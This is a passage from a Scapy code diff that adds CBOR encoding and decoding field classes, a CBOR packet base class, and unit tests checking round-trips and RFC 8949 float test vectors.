"<%s%r>" % (self.__class__.__name__, self.seq) + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return all(f.is_empty(pkt) for f in self.seq) + + def get_fields_list(self): + # type: () -> List[CBORF_field[Any, Any]] + return reduce(lambda x, y: x + y.get_fields_list(), + self.seq, []) + + def m2i(self, pkt, s): + # type: (Any, bytes) -> Tuple[Any, bytes] + """ + Decode a CBOR array. Each element is decoded by its corresponding + field in ``self.seq``. The decoded values are set directly on the + packet by each field's ``dissect`` call, so this method returns an + empty list (which is discarded by ``dissect``). + """ + try: + major_type, count, s = CBOR_decode_head(s) + except CBOR_Codec_Decoding_Error as e: + raise CBOR_Decoding_Error(str(e)) + if major_type != 4: + raise CBOR_Decoding_Error( + "Expected major type 4 (array), got %d" % major_type) + if count != len(self.seq): + raise CBOR_Decoding_Error( + "Array length mismatch: expected %d, got %d" % + (len(self.seq), count)) + for obj in self.seq: + try: + s = obj.dissect(pkt, s) + except CBORF_badsequence: + break + return [], s + + def dissect(self, pkt, s): + # type: (Any, bytes) -> bytes + _, x = self.m2i(pkt, s) + return x + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + items = b"".join(obj.build(pkt) for obj in self.seq) + return CBOR_encode_head(4, len(self.seq)) + items + + +_ARRAY_T = Union[ + 'CBOR_Packet', + Type[CBORF_field[Any, Any]], + 'CBORF_PACKET', + CBORF_field[Any, Any], +] + + +class CBORF_ARRAY_OF(CBORF_field[List[_ARRAY_T], List[CBOR_Object[Any]]]): + """ + CBOR array of homogeneous elements (major type 4). + Analogous to ASN1F_SEQUENCE_OF: variable-length array where every + element shares the same type, specified by ``cls``. + + ``cls`` may be a :class:`CBORF_field` class/instance (leaf type) or a + :class:`CBOR_Packet` subclass (structured type). + """ + CBOR_tag = CBOR_MajorTypes.ARRAY + islist = 1 + + def __init__(self, + name, # type: str + default, # type: Any + cls, # type: _ARRAY_T + ): + # type: (...) -> None + if isinstance(cls, type) and issubclass(cls, CBORF_field) or \ + isinstance(cls, CBORF_field): + if isinstance(cls, type): + self.fld = cls("_item", None) # type: ignore + else: + self.fld = cls + self._extract_item = lambda s, pkt: self.fld.m2i(pkt, s) + self.holds_packets = 0 + elif hasattr(cls, "CBOR_root") or callable(cls): + self.cls = cast("Type[CBOR_Packet]", cls) + self._extract_item = lambda s, pkt: self.extract_packet( + self.cls, s, _underlayer=pkt) + self.holds_packets = 1 + else: + raise ValueError("cls must be a CBORF_field or CBOR_Packet") + super(CBORF_ARRAY_OF, self).__init__(name, None) + self.default = default + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return CBORF_field.is_empty(self, pkt) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[List[Any], bytes] + try: + major_type, count, s = CBOR_decode_head(s) + except CBOR_Codec_Decoding_Error as e: + raise CBOR_Decoding_Error(str(e)) + if major_type != 4: + raise CBOR_Decoding_Error( + "Expected major type 4 (array), got %d" % major_type) + lst = [] + for _ in range(count): + c, s = self._extract_item(s, pkt) # type: ignore + if c is not None: + lst.append(c) + return lst, s + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + val = getattr(pkt, self.name) + if val is None: + val = [] + items = b"".join(bytes(item) for item in val) + return CBOR_encode_head(4, len(val)) + items + + def i2repr(self, pkt, x): + # type: (CBOR_Packet, Any) -> str + if self.holds_packets: + return repr(x) + elif x is None: + return "[]" + else: + return "[%s]" % ", ".join( + self.fld.i2repr(pkt, item) for item in x # type: ignore + ) + + def __repr__(self): + # type: () -> str + return "<%s %s>" % (self.__class__.__name__, self.name) + + +class CBORF_MAP(CBORF_field[Dict[str, Any], Dict[str, Any]]): + """ + CBOR map with a fixed set of named, typed fields (major type 5). + + Each field in ``seq`` represents one key-value pair. The key is the + field's ``name`` encoded as a CBOR text string. The value is encoded + and decoded by the corresponding :class:`CBORF_field`. + + Example:: + + class MyCBOR(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER("version", 1), + CBORF_TEXT_STRING("name", ""), + ) + """ + CBOR_tag = CBOR_MajorTypes.MAP + holds_packets = 1 + + def __init__(self, *seq, **kwargs): + # type: (*Any, **Any) -> None + # The map itself is a structural field without its own named slot on + # the packet; a placeholder name is used so the base class __init__ + # stays happy. Individual value fields are the ones that carry names + # (which also serve as the CBOR text-string keys in the wire encoding). + name = "_cbor_map" + default = {field.name: field.default for field in seq} + super(CBORF_MAP, self).__init__(name, None) + self.default = default + self.seq = seq + self.islist = 1 + + def __repr__(self): + # type: () -> str + return "<%s%r>" % (self.__class__.__name__, self.seq) + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return all(f.is_empty(pkt) for f in self.seq) + + def get_fields_list(self): + # type: () -> List[CBORF_field[Any, Any]] + return reduce(lambda x, y: x + y.get_fields_list(), + self.seq, []) + + def m2i(self, pkt, s): + # type: (Any, bytes) -> Tuple[Any, bytes] + """ + Decode a CBOR map. Keys are decoded as CBOR items and matched to + fields by name. Values are decoded by the matching field. Unknown + keys are silently skipped. + """ + try: + major_type, count, s = CBOR_decode_head(s) + except CBOR_Codec_Decoding_Error as e: + raise CBOR_Decoding_Error(str(e)) + if major_type != 5: + raise CBOR_Decoding_Error( + "Expected major type 5 (map), got %d" % major_type) + # Build a lookup from field name to field object. + field_map = {f.name: f for f in self.seq} + for _ in range(count): + # Decode the key (any CBOR type; convert to str for lookup). + key_obj, s = CBORcodec_Object.decode_cbor_item(s) + if isinstance(key_obj, CBOR_Object): + key = str(key_obj.val) + else: + key = str(key_obj) + fld = field_map.get(key) + if fld is not None: + s = fld.dissect(pkt, s) + else: + # Skip unknown value. + _unknown, s = CBORcodec_Object.decode_cbor_item(s) + return [], s + + def dissect(self, pkt, s): + # type: (Any, bytes) -> bytes + _, x = self.m2i(pkt, s) + return x + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + result = CBOR_encode_head(5, len(self.seq)) + for fld in self.seq: + # Encode key as a CBOR text string. + result += CBORcodec_TEXT_STRING.enc(CBOR_TEXT_STRING(fld.name)) + result += fld.build(pkt) + return result + + +class CBORF_SEMANTIC_TAG(CBORF_field[Tuple[int, Any], + CBOR_SEMANTIC_TAG]): + """ + CBOR semantic tag field (major type 6). + + Wraps an ``inner_field`` with the given numeric ``tag_num``. The inner + field handles encoding and decoding of the tagged value. The outer field + (named ``name``) stores the :class:`~scapy.cbor.cbor.CBOR_SEMANTIC_TAG` + wrapper (tag number + ``None`` placeholder), while the inner field stores + its value under its own name on the packet. + + Example:: + + class TimestampPkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG( + "tag_info", None, 1, CBORF_INTEGER("ts", 0) + ) + """ + CBOR_tag = CBOR_MajorTypes.TAG + + def __init__(self, + name, # type: str + default, # type: Any + tag_num, # type: int + inner_field, # type: CBORF_field[Any, Any] + ): + # type: (...) -> None + self.tag_num = tag_num + self.inner_field = inner_field + super(CBORF_SEMANTIC_TAG, self).__init__(name, default) + + def _wrap(self, val): + # type: (Any) -> CBOR_SEMANTIC_TAG + if isinstance(val, CBOR_SEMANTIC_TAG): + return val + return CBOR_SEMANTIC_TAG((self.tag_num, val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_SEMANTIC_TAG, bytes] + try: + major_type, tag_num, s = CBOR_decode_head(s) + except CBOR_Codec_Decoding_Error as e: + raise CBOR_Decoding_Error(str(e)) + if major_type != 6: + raise CBOR_Decoding_Error( + "Expected major type 6 (semantic tag), got %d" % major_type) + return CBOR_SEMANTIC_TAG((tag_num, None)), s # type: ignore + + def dissect(self, pkt, s): + # type: (CBOR_Packet, bytes) -> bytes + tag_obj, s = self.m2i(pkt, s) + self.set_val(pkt, tag_obj) + # Dissect the tagged content using the inner field. + return self.inner_field.dissect(pkt, s) + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + inner_bytes = self.inner_field.build(pkt) + return CBOR_encode_head(6, self.tag_num) + inner_bytes + + def get_fields_list(self): + # type: () -> List[CBORF_field[Any, Any]] + return [self] + self.inner_field.get_fields_list() + + +############################## +# Complex CBOR Fields # +############################## + +class CBORF_optional(CBORF_element): + """ + Wrapper making a :class:`CBORF_field` optional. + + During decoding, if the next CBOR item does not match the expected major + type, the field value is set to ``None`` and the stream is left unchanged. + """ + + def __init__(self, field): + # type: (CBORF_field[Any, Any]) -> None + self._field = field + + def __getattr__(self, attr): + # type: (str) -> Optional[Any] + return getattr(self._field, attr) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[Any, bytes] + try: + return self._field.m2i(pkt, s) + except (CBOR_Error, CBORF_badsequence, + CBOR_Codec_Decoding_Error): + return None, s + + def dissect(self, pkt, s): + # type: (CBOR_Packet, bytes) -> bytes + try: + return self._field.dissect(pkt, s) + except (CBOR_Error, CBORF_badsequence, + CBOR_Codec_Decoding_Error): + self._field.set_val(pkt, None) + return s + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + if self._field.is_empty(pkt): + return b"" + return self._field.build(pkt) + + def any2i(self, pkt, x): + # type: (CBOR_Packet, Any) -> Any + return self._field.any2i(pkt, x) + + def i2repr(self, pkt, x): + # type: (CBOR_Packet, Any) -> str + return self._field.i2repr(pkt, x) + + +class CBORF_PACKET(CBORF_field['CBOR_Packet', Optional['CBOR_Packet']]): + """ + CBOR field that encapsulates a nested :class:`CBOR_Packet`. + + The nested packet is encoded as-is (its ``CBOR_root.build()`` output) + and decoded by instantiating ``cls`` from the current byte stream. + """ + holds_packets = 1 + + def __init__(self, + name, # type: str + default, # type: Optional[CBOR_Packet] + cls, # type: Type[CBOR_Packet] + ): + # type: (...) -> None + self.cls = cls + super(CBORF_PACKET, self).__init__(name, None) + self.default = default + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[Any, bytes] + return self.extract_packet(self.cls, s, _underlayer=pkt) + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + if x is None: + return b"" + if isinstance(x, bytes): + return x + return bytes(x) + + def any2i(self, pkt, x): + # type: (CBOR_Packet, Any) -> CBOR_Packet + if hasattr(x, "add_underlayer"): + x.add_underlayer(pkt) + return super(CBORF_PACKET, self).any2i(pkt, x) # type: ignore + + def randval(self): # type: ignore + # type: () -> CBOR_Packet + return packet.fuzz(self.cls()) diff --git a/scapy/cborpacket.py b/scapy/cborpacket.py new file mode 100644 index 00000000000..eb12bedaea9 --- /dev/null +++ b/scapy/cborpacket.py @@ -0,0 +1,65 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +CBOR Packet + +Packet holding data encoded in Concise Binary Object Representation (CBOR). +Modelled after scapy/asn1packet.py. +""" + +from scapy.base_classes import Packet_metaclass +from scapy.packet import Packet + +from typing import ( + Any, + Dict, + Tuple, + Type, + cast, + TYPE_CHECKING, +) + +if TYPE_CHECKING: + from scapy.cbor.cborfields import CBORF_field # noqa: F401 + + +class CBORPacket_metaclass(Packet_metaclass): + def __new__(cls, + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[CBOR_Packet] + if dct.get("CBOR_root") is not None: + dct["fields_desc"] = dct["CBOR_root"].get_fields_list() + return cast( + 'Type[CBOR_Packet]', + super(CBORPacket_metaclass, cls).__new__(cls, name, bases, dct), + ) + + +class CBOR_Packet(Packet, metaclass=CBORPacket_metaclass): + CBOR_root = cast('CBORF_field[Any, Any]', None) + + def self_build(self): + # type: () -> bytes + """Build this CBOR packet to wire bytes using CBOR_root. + + Returns the raw packet cache when already built, otherwise delegates + to CBOR_root.build() which encodes all fields according to the CBOR + schema defined for this packet. + """ + if self.raw_packet_cache is not None: + return self.raw_packet_cache + return self.CBOR_root.build(self) + + def do_dissect(self, x): + # type: (bytes) -> bytes + """Dissect CBOR-encoded bytes into packet fields. + + Delegates to CBOR_root.dissect() which reads CBOR items from *x*, + populates each field on the packet, and returns any unconsumed bytes. + """ + return self.CBOR_root.dissect(self, x) diff --git a/test/scapy/layers/cbor.uts b/test/scapy/layers/cbor.uts index f56d116a505..f65c75d89ce 100644 --- a/test/scapy/layers/cbor.uts +++ b/test/scapy/layers/cbor.uts @@ -992,3 +992,2960 @@ for _ in range(50): pass roundtrip_count >= 45 + +########### CBOR Fields ########################################### + ++ CBORF scalar fields - CBORF_UNSIGNED_INTEGER + += CBORF_UNSIGNED_INTEGER basic encode/decode +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktUInt(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER("value", 42) + +pkt = PktUInt() +assert pkt.value.val == 42 +raw_data = bytes(pkt) +pkt2 = PktUInt(raw_data) +assert pkt2.value.val == 42 + += CBORF_UNSIGNED_INTEGER zero value +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktUIntZero(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER("value", 0) + +pkt = PktUIntZero() +raw_data = bytes(pkt) +assert raw_data == b'\x00' +pkt2 = PktUIntZero(raw_data) +assert pkt2.value.val == 0 + += CBORF_UNSIGNED_INTEGER large value roundtrip +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktUIntLarge(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER("value", 1000000) + +pkt = PktUIntLarge() +raw_data = bytes(pkt) +pkt2 = PktUIntLarge(raw_data) +assert pkt2.value.val == 1000000 + ++ CBORF scalar fields - CBORF_NEGATIVE_INTEGER + += CBORF_NEGATIVE_INTEGER basic encode/decode +from scapy.cbor.cborfields import CBORF_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktNInt(CBOR_Packet): + CBOR_root = CBORF_NEGATIVE_INTEGER("value", -1) + +pkt = PktNInt() +assert pkt.value.val == -1 +raw_data = bytes(pkt) +pkt2 = PktNInt(raw_data) +assert pkt2.value.val == -1 + += CBORF_NEGATIVE_INTEGER -100 roundtrip +from scapy.cbor.cborfields import CBORF_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktNInt100(CBOR_Packet): + CBOR_root = CBORF_NEGATIVE_INTEGER("value", -100) + +pkt = PktNInt100() +raw_data = bytes(pkt) +pkt2 = PktNInt100(raw_data) +assert pkt2.value.val == -100 + ++ CBORF scalar fields - CBORF_INTEGER + += CBORF_INTEGER positive value +from scapy.cbor.cborfields import CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktInt(CBOR_Packet): + CBOR_root = CBORF_INTEGER("value", 7) + +pkt = PktInt() +raw_data = bytes(pkt) +pkt2 = PktInt(raw_data) +assert pkt2.value.val == 7 + += CBORF_INTEGER negative value +from scapy.cbor.cborfields import CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PktIntNeg(CBOR_Packet): + CBOR_root = CBORF_INTEGER("value", -5) + +pkt = PktIntNeg() +raw_data = bytes(pkt) +pkt2 = PktIntNeg(raw_data) +assert pkt2.value.val == -5 + ++ CBORF scalar fields - CBORF_BYTE_STRING + += CBORF_BYTE_STRING basic encode/decode +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class PktBStr(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING("data", b"hello") + +pkt = PktBStr() +assert pkt.data.val == b"hello" +raw_data = bytes(pkt) +pkt2 = PktBStr(raw_data) +assert pkt2.data.val == b"hello" + += CBORF_BYTE_STRING empty bytes +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class PktBStrEmpty(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING("data", b"") + +pkt = PktBStrEmpty() +raw_data = bytes(pkt) +assert raw_data == b'\x40' +pkt2 = PktBStrEmpty(raw_data) +assert pkt2.data.val == b"" + ++ CBORF scalar fields - CBORF_TEXT_STRING + += CBORF_TEXT_STRING basic encode/decode +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class PktTStr(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING("title", "hello") + +pkt = PktTStr() +assert pkt.title.val == "hello" +raw_data = bytes(pkt) +pkt2 = PktTStr(raw_data) +assert pkt2.title.val == "hello" + += CBORF_TEXT_STRING empty string +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class PktTStrEmpty(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING("title", "") + +pkt = PktTStrEmpty() +raw_data = bytes(pkt) +assert raw_data == b'\x60' +pkt2 = PktTStrEmpty(raw_data) +assert pkt2.title.val == "" + ++ CBORF scalar fields - CBORF_BOOLEAN + += CBORF_BOOLEAN true value +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cbor.cbor import CBOR_TRUE +from scapy.cborpacket import CBOR_Packet + +class PktBool(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN("flag", True) + +pkt = PktBool() +assert isinstance(pkt.flag, CBOR_TRUE) +raw_data = bytes(pkt) +assert raw_data == b'\xf5' +pkt2 = PktBool(raw_data) +assert isinstance(pkt2.flag, CBOR_TRUE) + += CBORF_BOOLEAN false value +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cbor.cbor import CBOR_FALSE +from scapy.cborpacket import CBOR_Packet + +class PktBoolFalse(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN("flag", False) + +pkt = PktBoolFalse() +raw_data = bytes(pkt) +assert raw_data == b'\xf4' +pkt2 = PktBoolFalse(raw_data) +assert isinstance(pkt2.flag, CBOR_FALSE) + ++ CBORF scalar fields - CBORF_FLOAT + += CBORF_FLOAT encode/decode +from scapy.cbor.cborfields import CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class PktFloat(CBOR_Packet): + CBOR_root = CBORF_FLOAT("value", 1.5) + +pkt = PktFloat() +raw_data = bytes(pkt) +pkt2 = PktFloat(raw_data) +assert abs(pkt2.value.val - 1.5) < 1e-9 + += CBORF_NULL encode/decode +from scapy.cbor.cborfields import CBORF_NULL +from scapy.cbor.cbor import CBOR_NULL +from scapy.cborpacket import CBOR_Packet + +class PktNull(CBOR_Packet): + CBOR_root = CBORF_NULL("nothing") + +pkt = PktNull() +raw_data = bytes(pkt) +assert raw_data == b'\xf6' +pkt2 = PktNull(raw_data) +assert isinstance(pkt2.nothing, CBOR_NULL) + ++ CBORF scalar fields - CBORF_UNDEFINED + += CBORF_UNDEFINED encode/decode +from scapy.cbor.cborfields import CBORF_UNDEFINED +from scapy.cbor.cbor import CBOR_UNDEFINED +from scapy.cborpacket import CBOR_Packet + +class PktUndef(CBOR_Packet): + CBOR_root = CBORF_UNDEFINED("undef") + +pkt = PktUndef() +raw_data = bytes(pkt) +assert raw_data == b'\xf7' +pkt2 = PktUndef(raw_data) +assert isinstance(pkt2.undef, CBOR_UNDEFINED) + ++ CBORF structured fields - CBORF_ARRAY + += CBORF_ARRAY two-field encode/decode +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class MyCBOR(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("version", 1), + CBORF_TEXT_STRING("title", "test"), + ) + +pkt = MyCBOR() +assert pkt.version.val == 1 +assert pkt.title.val == "test" +raw_data = bytes(pkt) +pkt2 = MyCBOR(raw_data) +assert pkt2.version.val == 1 +assert pkt2.title.val == "test" + += CBORF_ARRAY three-field encode/decode +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class Multi(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("id", 99), + CBORF_TEXT_STRING("label", "x"), + CBORF_BOOLEAN("active", True), + ) + +pkt = Multi() +raw_data = bytes(pkt) +pkt2 = Multi(raw_data) +assert pkt2.id.val == 99 +assert pkt2.label.val == "x" + += CBORF_ARRAY single integer roundtrip +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class Single(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_UNSIGNED_INTEGER("count", 5), + ) + +pkt = Single() +raw_data = bytes(pkt) +pkt2 = Single(raw_data) +assert pkt2.count.val == 5 + ++ CBORF structured fields - CBORF_ARRAY_OF + += CBORF_ARRAY_OF with CBORF_INTEGER elements +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_INTEGER +from scapy.cbor.cbor import CBOR_UNSIGNED_INTEGER, CBOR_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class ArrOfInt(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF("items", [], CBORF_INTEGER) + +pkt = ArrOfInt() +pkt.items = [CBOR_UNSIGNED_INTEGER(1), CBOR_UNSIGNED_INTEGER(2), CBOR_UNSIGNED_INTEGER(3)] +raw_data = bytes(pkt) +pkt2 = ArrOfInt(raw_data) +assert len(pkt2.items) == 3 +assert pkt2.items[0].val == 1 +assert pkt2.items[2].val == 3 + ++ CBORF structured fields - CBORF_MAP + += CBORF_MAP basic encode/decode +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class MyMap(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER("version", 2), + CBORF_TEXT_STRING("title", "cbor"), + ) + +pkt = MyMap() +assert pkt.version.val == 2 +assert pkt.title.val == "cbor" +raw_data = bytes(pkt) +pkt2 = MyMap(raw_data) +assert pkt2.version.val == 2 +assert pkt2.title.val == "cbor" + += CBORF_MAP byte string value +from scapy.cbor.cborfields import CBORF_MAP, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class BinMap(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_BYTE_STRING("data", b"\xde\xad\xbe\xef"), + ) + +pkt = BinMap() +raw_data = bytes(pkt) +pkt2 = BinMap(raw_data) +assert pkt2.data.val == b"\xde\xad\xbe\xef" + ++ CBORF complex fields - CBORF_optional + += CBORF_optional present field +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class OptPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("version", 1), + CBORF_optional(CBORF_TEXT_STRING("title", "")), + ) + +pkt = OptPkt() +raw_data = bytes(pkt) +pkt2 = OptPkt(raw_data) +assert pkt2.version.val == 1 +assert pkt2.title.val == "" + ++ CBORF_PACKET nested packet + += CBORF_PACKET basic nesting +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class Inner(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("x", 10), + ) + +class Outer(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_TEXT_STRING("label", "outer"), + CBORF_PACKET("inner", None, Inner), + ) + +inner = Inner() +outer = Outer() +outer.label = outer.label # keep default +outer.inner = inner +raw_data = bytes(outer) +outer2 = Outer(raw_data) +assert outer2.label.val == "outer" + ++ CBORF_SEMANTIC_TAG + += CBORF_SEMANTIC_TAG encode with inner integer +from scapy.cbor.cborfields import CBORF_SEMANTIC_TAG, CBORF_INTEGER +from scapy.cbor.cbor import CBOR_SEMANTIC_TAG as CBOR_SEM +from scapy.cborpacket import CBOR_Packet + +class TaggedPkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG("tag_info", None, 1, CBORF_INTEGER("ts", 0)) + +pkt = TaggedPkt() +# Build encodes tag 1 + inner field default +raw_data = bytes(pkt) +# Major type 6 (tag), tag number 1 => 0xc1 +assert raw_data[0:1] == b'\xc1' + ++ CBOR_Packet / CBORF field integration + += CBOR_Packet fields_desc built from CBORF_ARRAY +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_UNSIGNED_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class Demo(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_UNSIGNED_INTEGER("id", 1), + CBORF_TEXT_STRING("desc", "demo"), + ) + +# fields_desc should contain both fields +field_names = [f.name for f in Demo.fields_desc] +assert "id" in field_names +assert "desc" in field_names + += CBOR_Packet roundtrip preserves raw bytes +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class Simple(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("a", 3), + CBORF_INTEGER("b", 7), + ) + +pkt = Simple() +raw_data = bytes(pkt) +pkt2 = Simple(raw_data) +assert bytes(pkt2) == raw_data + +########### Additional Unit Tests #################################### + ++ CBOR Simple Values + += Decode CBOR simple value 0 +data = bytes.fromhex('e0') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +from scapy.cbor.cbor import CBOR_SIMPLE_VALUE +isinstance(obj, CBOR_SIMPLE_VALUE) and obj.val == 0 and remainder == b'' + += Decode CBOR simple value 16 +data = bytes.fromhex('f0') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_SIMPLE_VALUE) and obj.val == 16 and remainder == b'' + += Decode CBOR simple value 255 (1-byte extended) +data = bytes.fromhex('f8ff') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_SIMPLE_VALUE) and obj.val == 255 and remainder == b'' + ++ CBOR Float Encodings - RFC 8949 Test Vectors + += Half-precision: positive zero (0xf90000) +import math +data = bytes.fromhex('f90000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 0.0 and remainder == b'' + += Half-precision: negative zero (0xf98000) +data = bytes.fromhex('f98000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == -0.0 and math.copysign(1, obj.val) == -1.0 and remainder == b'' + += Half-precision: 1.0 (0xf93c00) +data = bytes.fromhex('f93c00') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 1.0 and remainder == b'' + += Half-precision: 1.5 (0xf93e00) +data = bytes.fromhex('f93e00') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 1.5 and remainder == b'' + += Half-precision: max (65504.0) (0xf97bff) +data = bytes.fromhex('f97bff') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 65504.0 and remainder == b'' + += Half-precision: smallest subnormal (0xf90001) +data = bytes.fromhex('f90001') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and abs(obj.val - 5.960464477539063e-8) < 1e-15 and remainder == b'' + += Half-precision: smallest normal (0xf90400) +data = bytes.fromhex('f90400') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and abs(obj.val - 6.103515625e-5) < 1e-12 and remainder == b'' + += Half-precision: positive infinity (0xf97c00) +data = bytes.fromhex('f97c00') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isinf(obj.val) and obj.val > 0 and remainder == b'' + += Half-precision: negative infinity (0xf9fc00) +data = bytes.fromhex('f9fc00') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isinf(obj.val) and obj.val < 0 and remainder == b'' + += Half-precision: NaN (0xf97e00) +data = bytes.fromhex('f97e00') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isnan(obj.val) and remainder == b'' + += Single-precision: 100000.0 (0xfa47c35000) +data = bytes.fromhex('fa47c35000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 100000.0 and remainder == b'' + += Single-precision: max float32 (0xfa7f7fffff) +data = bytes.fromhex('fa7f7fffff') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and abs(obj.val - 3.4028234663852886e+38) < 1e30 and remainder == b'' + += Single-precision: positive infinity (0xfa7f800000) +data = bytes.fromhex('fa7f800000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isinf(obj.val) and obj.val > 0 and remainder == b'' + += Single-precision: NaN (0xfa7fc00000) +data = bytes.fromhex('fa7fc00000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isnan(obj.val) and remainder == b'' + += Double-precision: 1.1 (0xfb3ff199999999999a) +data = bytes.fromhex('fb3ff199999999999a') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and abs(obj.val - 1.1) < 1e-10 and remainder == b'' + += Double-precision: 1.0e+300 (0xfb7e37e43c8800759c) +data = bytes.fromhex('fb7e37e43c8800759c') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and abs(obj.val - 1.0e+300) / 1.0e+300 < 1e-10 and remainder == b'' + += Double-precision: NaN (0xfb7ff8000000000000) +data = bytes.fromhex('fb7ff8000000000000') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and 